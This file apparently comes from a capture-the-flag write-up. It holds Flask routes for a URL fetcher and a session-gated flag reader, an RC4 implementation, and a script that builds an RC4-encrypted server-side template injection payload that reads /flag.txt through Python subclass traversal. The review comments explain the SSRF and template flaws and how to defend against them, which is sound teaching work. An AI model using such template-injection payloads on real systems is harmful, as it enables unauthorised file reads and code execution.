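@app.route('/read')
def read():
    """Fetch the resource named by the ``url`` query parameter and return its body.

    ``url`` comes straight from the request, so this handler performs a
    server-side fetch on behalf of any caller. The original guard was a
    denylist (reject a leading ``file`` or any ``flag`` substring); a denylist
    cannot enumerate every URL form the opener accepts, so the scheme is now
    allowlisted to http/https instead.

    Returns:
        The fetched body, 'No Hack' when the URL is rejected, or
        'no response' when the parameter is missing or the fetch fails.

    NOTE(review): an http(s) allowlist still lets the server contact loopback
    and internal hosts; add destination filtering if this service can reach
    sensitive endpoints.
    """
    url = request.args.get('url')
    if url is None:
        # A missing parameter used to raise inside re.findall and surface as
        # 'no response'; keep that answer without relying on the exception.
        return 'no response'

    # Allowlist: re.match anchors at the start, so only http:// and https://
    # URLs get through.
    if not re.match(r'https?://', url, re.IGNORECASE):
        return 'No Hack'
    # Kept from the original filter as defence in depth.
    if re.search('flag', url, re.IGNORECASE):
        return 'No Hack'

    try:
        res = urllib.urlopen(url)
        try:
            return res.read()
        finally:
            # The original never closed the response object.
            res.close()
    except Exception as ex:
        print(str(ex))
        return 'no response'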
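@app.route('/flag')
def flag():
    """Return the contents of /flag.txt when the session username matches.

    Access is decided only by the ``username`` value stored in the session.

    Returns:
        The file contents for the matching session, otherwise 'Access denied'.

    NOTE(review): the check is only as strong as the session's integrity
    protection; confirm the application's secret key is strong and never
    disclosed.
    """
    # .get() instead of ['username']: a non-empty session without that key
    # used to raise KeyError and turn into an HTTP 500 instead of a denial.
    if session.get('username') == 'fuck':
        # Context manager so the file handle is closed after the read.
        with open('/flag.txt') as fh:
            return fh.read()
    return 'Access denied'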
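if __name__ == '__main__':
    # debug=True on a listener bound to every interface exposes the
    # framework's interactive debugger and full tracebacks to any client
    # that can reach the port. Debug mode is therefore disabled here;
    # enable it only on a loopback-bound development instance.
    app.run(
        debug=False,
        host="0.0.0.0"
    )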
def _init_S_box(self):
    """Build the 256-entry RC4 state table in ``self.Box`` from ``self.key``.

    Starts from the identity permutation and runs one key-dependent swap
    pass over all 256 positions. ``self.key`` is indexed modulo
    ``self.key_length``, and each key element is passed through ``ord()``,
    so the key must be a sequence of single characters.
    """
    self.Box = list(range(256))
    # Key repeated (cyclically) out to 256 entries.
    expanded_key = [self.key[pos % self.key_length] for pos in range(256)]
    swap_at = 0
    for pos, key_char in enumerate(expanded_key):
        swap_at = (swap_at + self.Box[pos] + ord(key_char)) % 256
        self.Box[pos], self.Box[swap_at] = self.Box[swap_at], self.Box[pos]
def crypt(self, plaintext):
    """XOR ``plaintext`` with the RC4 keystream derived from ``self.Box``.

    The same call both encrypts and decrypts, since the operation is a
    plain XOR. Returns a ``str`` built with ``chr()``, one character per
    input character.

    ``self.Box`` is permuted in place while the two counters restart at 0
    on every call, so a second call on the same instance neither continues
    nor restarts the keystream. NOTE(review): looks intended for one
    message per instance; confirm against the constructor.

    RC4 provides no integrity protection, and its keystream has known
    biases; it should not be relied on to protect or authenticate data.
    """
    box = self.Box  # alias only: swaps below still mutate self.Box
    x = 0
    y = 0
    pieces = []
    for ch in plaintext:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        key_byte = box[(box[x] + box[y]) % 256]
        pieces.append(chr(key_byte ^ ord(ch)))
    return ''.join(pieces)
# Builds the RC4-encrypted, URL-encoded request value used in this write-up
# and prints it.
#
# `cmd` is a template expression that walks from a list literal to the
# subclasses of the base object type and calls entry 40 with a file path.
# The index is specific to the interpreter build that evaluates the
# expression. Presumably the target decrypts this value and renders it with
# the Flask app's template engine; that route is not shown here.
#
# Defensive reading: the RC4 key is a constant the client also holds, so the
# encryption authenticates nothing. The underlying flaw is compiling
# request-derived text as a template. Pass such text to a fixed template as a
# context variable (or use a sandboxed environment) instead.
cmd = "{{ [].__class__.__base__.__subclasses__()[40]('/flag.txt').read() }}"
a = RC4('HereIsTreasure')
encrypted = a.crypt(cmd)
payload = urllib.parse.quote(encrypted)
# res = requests.get(url + payload)
print(payload)